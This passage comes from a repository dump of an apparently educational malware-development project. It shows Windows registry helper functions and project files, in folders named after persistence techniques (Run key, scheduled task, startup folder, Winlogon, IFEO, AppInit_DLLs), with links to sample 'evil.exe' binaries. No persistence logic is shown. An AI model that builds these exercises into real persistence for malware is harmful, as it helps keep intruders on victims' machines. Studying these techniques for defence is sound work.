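        readBuffer = grown;
        readDataLen = len;
        Ret = RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)readBuffer, &readDataLen);
    }
    RegCloseKey(hKey);

    if (Ret != ERROR_SUCCESS || (type != REG_SZ && type != REG_EXPAND_SZ)) {
        free(readBuffer);
        return FALSE;
    }

    // Guarantee a terminator: the stored data may lack one, and readDataLen may
    // be odd if the value was written byte-wise. Make room for it if needed.
    nChars = readDataLen / sizeof(WCHAR);
    if ((nChars + 1) * sizeof(WCHAR) > len) {
        grown = (PWCHAR)realloc(readBuffer, (nChars + 1) * sizeof(WCHAR));
        if (grown == NULL) {
            free(readBuffer);
            return FALSE;
        }
        readBuffer = grown;
    }
    readBuffer[nChars] = L'\0';

    *readData = readBuffer;
    return TRUE;
}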
140 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/MyRegistry.h:
--------------------------------------------------------------------------------
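#pragma once
// NOTE(review): the three include targets were lost when this page was rendered
// (the angle-bracketed names were stripped). MyRegistry.c uses the Reg* API,
// printf and malloc/realloc/free, which these headers provide.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define TOTAL_BYTES_READ 1024   // initial ReadStringFromRegistry buffer size, in bytes
#define OFFSET_BYTES 1024       // growth step, in bytes, while RegQueryValueEx reports ERROR_MORE_DATA

// All subkey and valueName arguments are wide strings (PWCHAR). Every function
// returns TRUE on success and FALSE on failure and closes any key handle it opened.
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData);
// On success *readData points to a malloc'd buffer the caller must free().
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData);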
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_1_Persistence_Run_Registry.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/Ex18_2_Persistence_Scheduled_Task.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/Ex18_2_Persistence_Scheduled_Task.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/Ex18_2_Persistence_Scheduled_Task.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/Ex18_2_Persistence_Scheduled_Task.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_2_Persistence_Scheduled_Task.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/Ex18_3_Persistence_Startup_Folder.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/Ex18_3_Persistence_Startup_Folder.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/Ex18_3_Persistence_Startup_Folder.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/Ex18_3_Persistence_Startup_Folder.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_3_Persistence_Startup_Folder.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/Ex18_4_Persistence_Winlogon_Registry.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/Ex18_4_Persistence_Winlogon_Registry.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/Ex18_4_Persistence_Winlogon_Registry.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/Ex18_4_Persistence_Winlogon_Registry.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/MyRegistry.h:
--------------------------------------------------------------------------------
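#pragma once
// NOTE(review): the three include targets were lost when this page was rendered
// (the angle-bracketed names were stripped). The implementation uses the Reg* API,
// printf and malloc/realloc/free, which these headers provide.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define TOTAL_BYTES_READ 1024   // initial ReadStringFromRegistry buffer size, in bytes
#define OFFSET_BYTES 1024       // growth step, in bytes, while RegQueryValueEx reports ERROR_MORE_DATA

// All subkey and valueName arguments are wide strings (PWCHAR). Every function
// returns TRUE on success and FALSE on failure.
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData);
// On success *readData points to a malloc'd buffer the caller must free().
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData);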
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/RegBak/Winlogon.reg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/RegBak/Winlogon.reg
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_4_Persistence_Winlogon_Registry.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/Ex18_5_Persistence_IFEO.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_5_Persistence_IFEO/Ex18_5_Persistence_IFEO.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/Ex18_5_Persistence_IFEO.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/Ex18_5_Persistence_IFEO.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/MyRegistry.c:
--------------------------------------------------------------------------------
1 | #include "MyRegistry.h"
2 |
/*
* Example usage (the function names below match the declarations in
* MyRegistry.h; the key/value arguments are wide strings, hence the L prefix):
BOOL status;
DWORD readData;
PWCHAR readMessage = NULL;

status = CreateRegistryKey(HKEY_CURRENT_USER, L"Aticleworld"); //create key
if (status != TRUE) return FALSE;

status = WriteDwordToRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"date", 12082016); //write dword
if (status != TRUE) return FALSE;

status = ReadDwordFromRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"date", &readData); //read dword
if (status != TRUE) return FALSE;
printf("%lu", readData);

status = WriteStringToRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"Message", L"Happy"); //write string
if (status != TRUE) return FALSE;

status = ReadStringFromRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"Message", &readMessage); //read string
if (status != TRUE) return FALSE;
if (readMessage != NULL) {
printf(" Message = %S\n", readMessage);
free(readMessage); // buffer is allocated by ReadStringFromRegistry and owned by the caller
readMessage = NULL;
}
*/
30 |
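/*
 * Create the subkey `subkey` under hKeyParent, or open it if it already exists,
 * and immediately close the handle. The function therefore only reports whether
 * the key now exists and could be opened.
 *
 * hKeyParent: an open parent key (for example HKEY_CURRENT_USER).
 * subkey:     wide-character subkey path relative to hKeyParent; NULL is rejected.
 * Returns TRUE on success, FALSE on any error.
 *
 * Fix: the original called RegCloseKey(hKey) on the failure path, but on failure
 * RegCreateKeyEx has not stored a valid handle in hKey, so that close operated
 * on an uninitialised value.
 */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
{
    HKEY hKey = NULL;
    DWORD dwDisposition = 0;   // REG_CREATED_NEW_KEY or REG_OPENED_EXISTING_KEY; not needed by callers
    LONG Ret;

    if (subkey == NULL)
        return FALSE;

    // KEY_ALL_ACCESS is kept from the original; since the handle is closed right
    // away, a narrower mask such as KEY_WRITE would also be sufficient here.
    Ret = RegCreateKeyEx(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
    if (Ret != ERROR_SUCCESS)
        return FALSE;   // no valid handle to close on this path

    RegCloseKey(hKey);
    return TRUE;
}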
46 |
/*
 * Store `data` as a REG_DWORD value named valueName under hKeyParent\subkey.
 * The subkey must already exist; it is opened with KEY_WRITE only.
 *
 * Returns TRUE when the value was written, FALSE if the key could not be
 * opened or the value could not be set. The key handle is always closed.
 */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
{
    HKEY hKey;
    BOOL written = FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // The DWORD is passed by address; sizeof(data) is the REG_DWORD payload size.
    if (RegSetValueEx(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data)) == ERROR_SUCCESS)
        written = TRUE;

    RegCloseKey(hKey);
    return written;
}
65 |
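/*
 * Store the NUL-terminated wide string strData as a REG_SZ value named
 * valueName under hKeyParent\subkey. The subkey must already exist.
 *
 * The byte count handed to RegSetValueEx includes the terminating NUL, as the
 * API expects for REG_SZ, and is derived from sizeof(WCHAR) rather than the
 * literal 2 used originally.
 *
 * Fix: a NULL strData is rejected instead of being passed to lstrlen/RegSetValueEx,
 * which would have written from a NULL pointer.
 * Returns TRUE when the value was written, FALSE otherwise.
 */
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
{
    HKEY hKey;
    DWORD cbData;
    BOOL written = FALSE;

    if (strData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Size in bytes including the terminator: (characters + 1) * sizeof(WCHAR).
    cbData = ((DWORD)lstrlenW(strData) + 1) * sizeof(WCHAR);
    if (RegSetValueEx(hKey, valueName, 0, REG_SZ, (LPBYTE)strData, cbData) == ERROR_SUCCESS)
        written = TRUE;

    RegCloseKey(hKey);
    return written;
}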
82 |
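/*
 * Read the REG_DWORD value valueName under hKeyParent\subkey into *readData.
 *
 * Fix: the original returned TRUE even when RegQueryValueEx failed, so callers
 * would use an uninitialised *readData; it also accepted any 4-byte value
 * regardless of its registry type. Now TRUE is returned only when the value
 * exists, has type REG_DWORD and was read in full; on failure *readData is
 * left untouched.
 *
 * readData: output pointer; NULL is rejected.
 * Returns TRUE on success, FALSE otherwise. The key handle is always closed.
 */
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData)
{
    HKEY hKey;
    DWORD data = 0;
    DWORD len = sizeof(data);   // in: buffer size, out: bytes stored
    DWORD type = REG_NONE;
    BOOL ok = FALSE;

    if (readData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Ask for the type as well so a same-sized value of another type is not
    // silently interpreted as a DWORD.
    if (RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)&data, &len) == ERROR_SUCCESS
        && type == REG_DWORD && len == sizeof(data)) {
        *readData = data;
        ok = TRUE;
    }

    RegCloseKey(hKey);
    return ok;
}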
105 |
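/*
 * Read the string value valueName under hKeyParent\subkey into a newly
 * allocated, NUL-terminated wide-string buffer. On success *readData receives
 * the buffer and the caller releases it with free(); on failure *readData is
 * untouched and no memory is leaked.
 *
 * The buffer starts at TOTAL_BYTES_READ bytes and grows by OFFSET_BYTES while
 * RegQueryValueEx reports ERROR_MORE_DATA.
 *
 * Fixes relative to the original:
 *  - the buffer was allocated as sizeof(PWCHAR)*len bytes while the API was
 *    told it held len bytes (inconsistent sizing);
 *  - a failed realloc overwrote the only pointer to the old buffer;
 *  - the buffer leaked on every error path;
 *  - RegQueryValueEx does not guarantee a terminating NUL, so one is now
 *    written explicitly;
 *  - only REG_SZ and REG_EXPAND_SZ values are accepted.
 *
 * readData: output pointer; NULL is rejected.
 * Returns TRUE on success, FALSE otherwise. The key handle is always closed.
 */
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData)
{
    HKEY hKey;
    DWORD len = TOTAL_BYTES_READ;   // capacity of readBuffer, in bytes
    DWORD readDataLen;              // bytes the API needs (ERROR_MORE_DATA) or wrote (success)
    DWORD type = REG_NONE;
    PWCHAR readBuffer;
    PWCHAR grown;
    LONG Ret;
    size_t nChars;

    if (readData == NULL)
        return FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // Allocate exactly the capacity reported to the API.
    readBuffer = (PWCHAR)malloc(len);
    if (readBuffer == NULL) {
        RegCloseKey(hKey);
        return FALSE;
    }

    readDataLen = len;
    Ret = RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)readBuffer, &readDataLen);
    while (Ret == ERROR_MORE_DATA) {
        // Keep the old pointer until realloc succeeds so a failure does not leak it.
        len += OFFSET_BYTES;
        grown = (PWCHAR)realloc(readBuffer, len);
        if (grown == NULL) {
            free(readBuffer);
            RegCloseKey(hKey);
            return FALSE;
        }
        readBuffer = grown;
        readDataLen = len;
        Ret = RegQueryValueEx(hKey, valueName, NULL, &type, (LPBYTE)readBuffer, &readDataLen);
    }
    RegCloseKey(hKey);

    if (Ret != ERROR_SUCCESS || (type != REG_SZ && type != REG_EXPAND_SZ)) {
        free(readBuffer);
        return FALSE;
    }

    // Guarantee a terminator: the stored data may lack one, and readDataLen may
    // be odd if the value was written byte-wise. Make room for it if needed.
    nChars = readDataLen / sizeof(WCHAR);
    if ((nChars + 1) * sizeof(WCHAR) > len) {
        grown = (PWCHAR)realloc(readBuffer, (nChars + 1) * sizeof(WCHAR));
        if (grown == NULL) {
            free(readBuffer);
            return FALSE;
        }
        readBuffer = grown;
    }
    readBuffer[nChars] = L'\0';

    *readData = readBuffer;
    return TRUE;
}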
140 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/MyRegistry.h:
--------------------------------------------------------------------------------
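#pragma once
// NOTE(review): the three include targets were lost when this page was rendered
// (the angle-bracketed names were stripped). MyRegistry.c uses the Reg* API and
// malloc/realloc/free; <stdio.h> is kept for the printf-based example in MyRegistry.c.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define TOTAL_BYTES_READ 1024   // initial ReadStringFromRegistry buffer size, in bytes
#define OFFSET_BYTES 1024       // growth step, in bytes, while RegQueryValueEx reports ERROR_MORE_DATA

// All subkey and valueName arguments are wide strings (PWCHAR). Every function
// returns TRUE on success and FALSE on failure and closes any key handle it opened.
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData);
// On success *readData points to a malloc'd buffer the caller must free().
BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData);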
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_5_Persistence_IFEO/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_5_Persistence_IFEO.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/Ex18_6_Persistence_AppInit_DLLs.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/Ex18_6_Persistence_AppInit_DLLs.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/Ex18_6_Persistence_AppInit_DLLs.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/Ex18_6_Persistence_AppInit_DLLs.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/MyRegistry.c:
--------------------------------------------------------------------------------
1 | #include "MyRegistry.h"
2 |
/*
* Example usage (the function names below match the declarations in
* MyRegistry.h; the key/value arguments are wide strings, hence the L prefix):
BOOL status;
DWORD readData;
PWCHAR readMessage = NULL;

status = CreateRegistryKey(HKEY_CURRENT_USER, L"Aticleworld"); //create key
if (status != TRUE) return FALSE;

status = WriteDwordToRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"date", 12082016); //write dword
if (status != TRUE) return FALSE;

status = ReadDwordFromRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"date", &readData); //read dword
if (status != TRUE) return FALSE;
printf("%lu", readData);

status = WriteStringToRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"Message", L"Happy"); //write string
if (status != TRUE) return FALSE;

status = ReadStringFromRegistry(HKEY_CURRENT_USER, L"Aticleworld", L"Message", &readMessage); //read string
if (status != TRUE) return FALSE;
if (readMessage != NULL) {
printf(" Message = %S\n", readMessage);
free(readMessage); // buffer is allocated by ReadStringFromRegistry and owned by the caller
readMessage = NULL;
}
*/
30 |
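/*
 * Create the subkey `subkey` under hKeyParent, or open it if it already exists,
 * and immediately close the handle. The function therefore only reports whether
 * the key now exists and could be opened.
 *
 * hKeyParent: an open parent key (for example HKEY_CURRENT_USER).
 * subkey:     wide-character subkey path relative to hKeyParent; NULL is rejected.
 * Returns TRUE on success, FALSE on any error (the Win32 error code is printed).
 *
 * Fix: the original printed GetLastError(), which the Reg* functions do not set;
 * they return the Win32 error code directly, so that value is what gets printed.
 */
BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
{
    HKEY hKey = NULL;
    DWORD dwDisposition = 0;   // REG_CREATED_NEW_KEY or REG_OPENED_EXISTING_KEY; not needed by callers
    LONG Ret;

    if (subkey == NULL)
        return FALSE;

    // KEY_ALL_ACCESS is kept from the original; since the handle is closed right
    // away, a narrower mask such as KEY_WRITE would also be sufficient here.
    Ret = RegCreateKeyEx(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
    if (Ret != ERROR_SUCCESS) {
        // hKey holds no valid handle on failure, so nothing is closed here.
        printf(" [-] Error Opening or Creating new key. Code = %ld\n", Ret);
        return FALSE;
    }

    RegCloseKey(hKey);
    return TRUE;
}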
46 |
/*
 * Store `data` as a REG_DWORD value named valueName under hKeyParent\subkey.
 * The subkey must already exist; it is opened with KEY_WRITE only.
 *
 * Returns TRUE when the value was written, FALSE if the key could not be
 * opened or the value could not be set. The key handle is always closed.
 */
BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
{
    HKEY hKey;
    BOOL written = FALSE;

    if (RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
        return FALSE;

    // The DWORD is passed by address; sizeof(data) is the REG_DWORD payload size.
    if (RegSetValueEx(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data)) == ERROR_SUCCESS)
        written = TRUE;

    RegCloseKey(hKey);
    return written;
}
65 |
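/*
 * Store the NUL-terminated wide string strData as a REG_SZ value named
 * valueName under hKeyParent\subkey. The subkey must already exist.
 *
 * The byte count handed to RegSetValueEx includes the terminating NUL, as the
 * API expects for REG_SZ, and is derived from sizeof(WCHAR) rather than the
 * literal 2 used originally.
 *
 * Fix: a NULL strData is rejected instead of being passed to lstrlen/RegSetValueEx,
 * which would have written from a NULL pointer.
 * Returns TRUE when the value was written, FALSE otherwise.
 */
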